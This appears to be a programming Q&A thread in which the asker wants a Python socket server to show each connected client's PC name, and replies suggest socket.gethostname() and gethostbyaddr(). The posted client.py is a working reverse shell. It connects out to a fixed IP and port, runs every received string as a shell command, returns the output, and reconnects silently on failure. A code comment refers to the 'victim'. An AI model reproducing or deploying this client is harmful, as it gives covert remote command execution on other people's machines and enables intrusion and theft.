# how to get user PC name in socket programming python

Tags: python, python-3.x, sockets

I write a socket programming code `client.py` and `server.py` and it work awesome. Now I face a little problem I want to get the name of PC and show it like this device is connected below is the code. I tried different method but all fail. Basically, I have a couple Windows computers on my network that will be running a python script. So through this method I will know all computer name

```
client.py

import os, socket, subprocess ,getpass

def shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    host = '192.168.100.9'
    port = 9995

    s.connect((host, port))
    # userName = getpass.getuser()
    # s.send(str.encode(userName))
    # print(userName)
    while True:
        try:
            data = s.recv(800000)
            if data[:2].decode("utf-8") == 'cd':
                os.chdir(data[3:].decode("utf-8"))

            if len(data) > 0:
                cmd = subprocess.Popen(data[:].decode("utf-8"),shell=True, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
                output_byte = cmd.stdout.read() + cmd.stderr.read()
                output_str = str(output_byte,"utf-8")
                currentWD = os.getcwd() + "> "
                s.send(str.encode(output_str + currentWD))

                # print(output_str)       # if you want to show the output to the victim
        except:
            shell()


if __name__ == "__main__":
    shell()
```

below is server code

```
server.py 

def list_connections():
    results = ''

    for i, conn in enumerate(all_connections):
        try:
            conn.send(str.encode(' '))
            conn.recv(80000000)
        except:
            del all_connections[i]
            del all_address[i]
            continue

        results = str(i) + "   " + str(all_address[i][0]) + "   " + str(all_address[i][1]) + "\n"
     print("----Clients----" + "\n" + results)
```

it gave me output like this

```
output::
----Clients----
0   192.168.100.9   55747
```

I want output like this:::

```
output::
----Clients----
0 PC_NAME 192.168.100.9 55747
```

Comment: you could use the client script to get the hostname and send it to the server script, the server could then hold a mapping between ip and hostname. `socket.gethostname()`

Comment: I already did it. through this I get the pc name but if you look to my output that I want It's not showing like this

Comment: You can get the computer name from os.environ['HOSTNAME'] or from os.uname()[1].

Answer (score 1, accepted):

You can attempt to call [`socket.gethostbyaddr()`](https://docs.python.org/3.8/library/socket.html#//apple_ref/Function/socket.gethostbyaddr) on the IP address.

However, that depends on the DNS configuration of the server system - there's no real guarantee that the machines have registered their names with the local name server.

Comment: I tried it. it working but i want to display PC name in server. when the user connect